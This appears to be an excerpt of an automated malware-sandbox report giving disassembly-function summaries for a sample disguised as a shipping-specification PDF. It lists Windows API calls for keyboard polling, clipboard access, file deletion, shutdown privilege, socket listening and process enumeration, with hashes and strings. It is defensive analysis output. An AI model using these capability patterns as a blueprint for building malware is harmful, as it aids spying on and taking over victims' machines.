                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper
                                      • String ID:
                                      • API String ID: 1724414362-0
                                      • Opcode ID: 152fb3a6ec6cca40eee6daf851676b26cf445f0c1cd955b0d294339bbd6db965
                                      • Instruction ID: f1742b151c68882365903674b71f479ecd86167d1fec31b87f114ec56722d15d
                                      • Opcode Fuzzy Hash: 152fb3a6ec6cca40eee6daf851676b26cf445f0c1cd955b0d294339bbd6db965
                                      • Instruction Fuzzy Hash: 5BE15D75604210AFCB16DF29C995E6ABBE8FF8A710F04886DF44ADB261DB30ED05CB51
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00382B5F
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00382BE0
                                      • GetKeyState.USER32(000000A0), ref: 00382BFB
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00382C15
                                      • GetKeyState.USER32(000000A1), ref: 00382C2A
                                      • GetAsyncKeyState.USER32(00000011), ref: 00382C42
                                      • GetKeyState.USER32(00000011), ref: 00382C54
                                      • GetAsyncKeyState.USER32(00000012), ref: 00382C6C
                                      • GetKeyState.USER32(00000012), ref: 00382C7E
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00382C96
                                      • GetKeyState.USER32(0000005B), ref: 00382CA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                      • Instruction ID: 532c199b9bfda272fb8d3c580714ed1951ced2e72e30aad6fbb31ce2b21ec0d7
                                      • Opcode Fuzzy Hash: df7222d00df68b77efc74008eddebe1d8e23797595a2ce3998684e0a40548693
                                      • Instruction Fuzzy Hash: E841B2345047C96DFF37BB6489047BBBEB06F12344F0580D9E9C6562C2EBA499C8C7A2
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0038F62B
                                      • FindClose.KERNEL32(00000000), ref: 0038F67F
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6A4
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038F6BB
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038F6E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FileTime$FindLocal$CloseFirstSystem
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3238362701-2428617273
                                      • Opcode ID: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                      • Instruction ID: 742999cb9fa96a2c57aba02c127b0606c104cc507fc28823e6873e47d5e2298b
                                      • Opcode Fuzzy Hash: 25ab6d3c59b022954b93a7869f7bf3cf23b685ac66e49afe79c4c990ec97ee22
                                      • Instruction Fuzzy Hash: 8FA110B2408344ABC352EB94C885DAFB7ECAF98705F444D2EF585CA152EB34E949C762
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 003909DF
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 003909EF
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003909FB
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00390A98
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AAC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390ADE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390AFF
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00390B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local$System
                                      • String ID: *.*
                                      • API String ID: 1464919966-438819550
                                      • Opcode ID: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                      • Instruction ID: 0d099e1c82a6cd5f16f2fa7d7ce258d3c366e6be426a284a2e8f20e7ba31b93e
                                      • Opcode Fuzzy Hash: 7553b180d67da6ea4086656c7127005218c591f5bbfdae75ef020e9ba8afed49
                                      • Instruction Fuzzy Hash: 4C615A725043059FDB15EF60C84599EB3E8FF89314F04891AF989DB252DB31EA45CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                      • API String ID: 0-2023335898
                                      • Opcode ID: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                      • Instruction ID: 1dfe9c3a63647fbf643f2e0307fb4fa64be34248bd9421694f1038f40246ff0b
                                      • Opcode Fuzzy Hash: 0914caa1ca2de617f93f3dab6d81964ae14d9c0b8108fa00519c8db60e02c8ea
                                      • Instruction Fuzzy Hash: 8282C071D04219CFCB26CF98C8807EDBBB5BF44314F2681A9D959AB751E730AE85CB90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                      • Instruction ID: 262c0081097a17ecfe95b50cd07c9c4051f297e8aaf256c4022e34688dbbbfd5
                                      • Opcode Fuzzy Hash: 1d4ffac07129bada24e1a644a4e7cdedb9801943f2c124da609e2562d323624f
                                      • Instruction Fuzzy Hash: 40215A31301210AFDB13AF64DD4AF6E77A8EF44711F05842AF95ADB2A1DB30E911CB54
                                      APIs
                                        • Part of subcall function 00386EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00385FA6,?), ref: 00386ED8
                                        • Part of subcall function 003872CB: GetFileAttributesW.KERNEL32(?,00386019), ref: 003872CC
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00386474
                                      • DeleteFileW.KERNEL32(?), ref: 003864DA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003864EB
                                      • FindClose.KERNEL32(00000000), ref: 00386506
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: File$Find$AttributesCloseDeleteFirstFullNameNextPath
                                      • String ID: \*.*$p1Kw`KLw
                                      • API String ID: 1127339523-1688704836
                                      • Opcode ID: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                      • Instruction ID: 9a1facd701b6afc5db46735b1db745ffc9dc37f39e21a0e07f5ac346c2443e5e
                                      • Opcode Fuzzy Hash: 506ec71ff2a8b747783d5648882317ca921573efef0727765af6ee3694a25892
                                      • Instruction Fuzzy Hash: 393184B24083849EC722EBA48886DDFB7DCAF56310F44496EF6D8C7141EA35E50D8767
                                      APIs
                                        • Part of subcall function 0037B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                        • Part of subcall function 0037B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                        • Part of subcall function 0037B134: GetLastError.KERNEL32 ref: 0037B1BA
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00387A0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                      • Instruction ID: 546218665d2453d73a47970211b6169efe9b2c7507e1f5baed10797f8645093c
                                      • Opcode Fuzzy Hash: 63d02b08e188c1150c0b2c808fc6cb8c05a015e037f9f16ef9a676f342f669dc
                                      • Instruction Fuzzy Hash: DD01B5716583116AE72E3664CC8ABBE725D9700340F3504A4FD03E21C1D669DE0083B4
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00398CA8
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398CB7
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00398CD3
                                      • listen.WSOCK32(00000000,00000005), ref: 00398CE2
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398CFC
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00398D10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                      • Instruction ID: 889cbc4d916eedb90dabb0599fa07347609df62e5d02ee9fd4a75f28d12162ec
                                      • Opcode Fuzzy Hash: 8c10b134de8d30b0422881a0d44fb6fd6b3fd6f2cada31b2c0d217566dd0985b
                                      • Instruction Fuzzy Hash: 3321B1316002009FCB12EF68CD45F6EB7E9EF89720F118558F956EB2E2CB70AD418B61
                                      APIs
                                        • Part of subcall function 00379ABF: CLSIDFromProgID.OLE32 ref: 00379ADC
                                        • Part of subcall function 00379ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                        • Part of subcall function 00379ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                        • Part of subcall function 00379ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0039C235
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0039C38C
                                      • CoTaskMemFree.OLE32(?), ref: 0039C397
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0039C3E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 4175897753-2785691316
                                      • Opcode ID: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                      • Instruction ID: b3dc16d3ccadd1fede2f28ceed1c5852d7b00d9c3602202930b6e2a183a88389
                                      • Opcode Fuzzy Hash: 016e7cacdb43f6cc02be6f06808fd43e46f7a3855c62df9b5c7aa5bcd305244f
                                      • Instruction Fuzzy Hash: FA913E71D10218ABDF12DF95DC91EEEBBB8EF04710F10816AF519AB291DB706A45CFA0
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003813DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($,2?$<2?$|
                                      • API String ID: 1659193697-3385512009
                                      • Opcode ID: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                      • Instruction ID: 7bb2461deb0c6f4248ccfa2e61f8195f5b6fa2c75bfd4ea49f0691353aaf0caa
                                      • Opcode Fuzzy Hash: b046f05b95574edafdbc654e5b69ef21e6983eff3c4fcf80fa28c7e5a868fc0f
                                      • Instruction Fuzzy Hash: A5323675A007059FC729DF69C48196AB7F4FF48320B12C4AEE59ADB3A1E770E942CB44
                                      APIs
                                        • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00399296
                                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003992B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      • Opcode ID: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                      • Instruction ID: 4978d68f6583b19c1e5e04f8a27cefa290613f78835a6650d6d1f21d57b11e0b
                                      • Opcode Fuzzy Hash: b444de2d1865ff0c523010433b6cec23d669d5c4c7109676b903836b0505f65d
                                      • Instruction Fuzzy Hash: 3741AE70600204AFDB12AF68C882F7E77EDEF44724F14455DF956AF2A2DB74AE018B91
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                      • Instruction ID: 132bddfedb8d78186be859a1ec20cd631fe37b1a70cdf355c04560d71a2ac0ce
                                      • Opcode Fuzzy Hash: 2604368930a8db8a01bce76ebaf58a591b405e278971ea31eb301b6aa44bb506
                                      • Instruction Fuzzy Hash: 9511BC313002116FE7232F26DC84E6FBB9CEF86760F450429F84ADB291CF30E90286A4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )k7$1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 0-2626400329
                                      • Opcode ID: ac48a10249df2e92790f1a5bab84cd8aecd37b62b8fe3a714232c303f9d0bf73
                                      • Instruction ID: d15472ea962f9e2c0224006e7e8fa4941581c440c8fcc6c677279807600474bb
                                      • Opcode Fuzzy Hash: ac48a10249df2e92790f1a5bab84cd8aecd37b62b8fe3a714232c303f9d0bf73
                                      • Instruction Fuzzy Hash: 0E626E75E0465A8BDF26CFA8C8402EDFBB1FF58310F65816AD859EB341D7789942CB80
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003665DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FeaturePresentProcessor
                                      • String ID: Genu$ineI$ntel
                                      • API String ID: 2325560087-3389352399
                                      • Opcode ID: b2e2eeaf2ec658a25446932a355b03164cb4108c909658d4d9d765ddb18faaf2
                                      • Instruction ID: 1a9d306a2deb6579d9fff79be139810a5a45275fdb07376a80e880c09b81540b
                                      • Opcode Fuzzy Hash: b2e2eeaf2ec658a25446932a355b03164cb4108c909658d4d9d765ddb18faaf2
                                      • Instruction Fuzzy Hash: BA31B8B2C09716DBDB258F69E98A22AFBB4FB40355F11C53EE419EB254C375A850CF80
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0035E014,774B0AE0,0035DEF1,003DDC38,?,?), ref: 0035E02C
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0035E03E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                      • Instruction ID: 9994c6dd4d99242e31d3ecf5f6f2bcd63bc45a70a96ce64d326666b9d595b48b
                                      • Opcode Fuzzy Hash: 757597f7d477094613d61b0fff64616c5e2de454c28f06c489d66185673b5108
                                      • Instruction Fuzzy Hash: 37D0A732800712DFC7374F61EC08E7376D8AB10301F2D4429F882D31A0D7B4D8848750
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00386583
                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                      • Instruction ID: 4554f64c8dc4530dc9a96716584d2f19eb124e785e456ac47c651b79fcb1122c
                                      • Opcode Fuzzy Hash: 7ef89de9cdbfa4f3659e82b6facc5558fc0e9d9c1f64d8124b84814f8cab9d6e
                                      • Instruction Fuzzy Hash: BA216271900218ABDB12BBA4CD89FEEB7BCAB49300F5004E9F505E7145EB71AF85CB60
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 0035B22F
                                        • Part of subcall function 0035B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
